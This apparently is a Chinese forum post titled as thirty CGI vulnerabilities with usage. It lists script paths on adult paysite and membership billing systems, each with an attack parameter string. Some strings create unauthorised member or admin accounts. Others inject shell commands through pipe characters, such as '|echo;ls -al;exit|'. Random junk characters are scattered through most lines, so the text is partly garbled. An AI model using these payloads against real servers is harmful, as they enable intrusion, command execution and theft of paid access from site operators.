Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
username=username&password=password

3 H2 c" U& j  R% l7 g0 X/index.cgi
5 A& f( O% K' Dwei=ren&gen=command

/passmaster.cgi
3 R% J3 u6 f7 r' z# TAction=Add&Username=Username&Password=Password

/accountcreate.cgi
$ s2 B5 e( R7 n) U6 O- |! k2 Y0 j9 cusername=username&password=password&ref1=|echo;ls|
; Y4 i; c" @! \2 I3 O8 |; m9 q
/form.cgi
+ C4 A& \. {% p* ]+ l- mname=xxxx&email=email&subject=xxxx&response=|echo;ls|

6 F$ y3 D6 Q% N& l$ \/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
! Z8 h3 J8 n8 C/ d
/ccbill-local.asp
1 b) K- c, T, A: s/ z. i+ T9 C  opost_values=username:password
, w2 ]: `( N4 a: @
) v' A1 u( f* t, @2 ~8 x5 e/count.cgi
pinfile=|echo;ls -la;exit|

5 ^' z) {: q. K/ U/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

4 k# B/ x' Y# J9 R/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
# _; x# W. ~* T) u/ R- x3 K. P4 ?
7 R4 ]$ I* R1 Y/af.cgi
_browser_out=|echo;ls -la;exit;|

# U: J& b5 e& ]1 ~& d4 \/modify.cgi
& Q: r9 f$ a4 rusername=username&password=password&expire=30

/openjournal.cgi
9 g7 Z' x; R# }/ g: X$ Vedit=1&ct=2&go=|echo;ls -al;exit|
+ u6 C$ h* B6 ^% r1 H( S! _% @
/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
5 E$ m& F" j: ecommand=enable&username=username&password=password
; T# R9 P+ Z4 |) }8 u
/recon.cgi
7 _3 w+ o% v3 |# H: e1 L9 zsearchoption=3&searchfor=echo;ls -la;exit

6 D  m2 r' I7 F/htadd.pl
configfile=|echo; ls -alt; exit
! a3 J" n  B. d2 \$ V) h
/gx9passwd.cgi
6 l* _# i0 m4 Q: C% u% |1 Mcmd=ADD&user=username&pass=password
$ q3 f# |* c0 J: D% D5 l
: e% p: l& V+ r+ n( S: A/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
  Z/ H! k* q, f. e  j$ q4 v
7 m+ x3 I9 f& d/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
! `& z! y6 r7 z4 U
/usercontrol.cgi
- _; i) {, ~  J  O' tcommand=enable&username=USER&password=PASS
  {2 h' e8 n$ U7 l7 b
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

# g! Q7 s0 B+ ?' e/addusr.pl
3 R. o& g0 G  K! p% [- ~user=USER&pass=PASS&confirm=PASS

/pincount.cgi
" J% g" _3 V" h* m/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
3 p: Q+ }$ N2 _1 _
% b7 ?1 l; [" a/ b! p, |/accountcreate.cgi
% |7 i$ O4 p! Y/ c4 l/cgi-bin/gateway/accountcreate.cgi
# o% K4 @) S3 }- ]% musername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
' |6 a/ B( I. z. t3 T3 |( Z9 J/env.cgi
. ^! ^* ~/ |: G; S8 ^ADD+;echo;pwd;exit
4 g' q8 X! z4 J2 n  @" b( e
/count.cgi
4 @+ R. U" g$ d2 J9 Rpinfile=|echo;pwd;exit|

/recon.cgi
  o& N8 z4 Z( j7 b. Q1 Q7 isearchoption=1&searchfor=|echo;ls%20-al;exit|

# Y; ~* D" K2 J4 C- g! e6 ?* E/add.cgi
username=username&password=password&expire=30
! g1 a* M) m/ n, a& v% t$ ?
' V; l# f. ?2 r==============================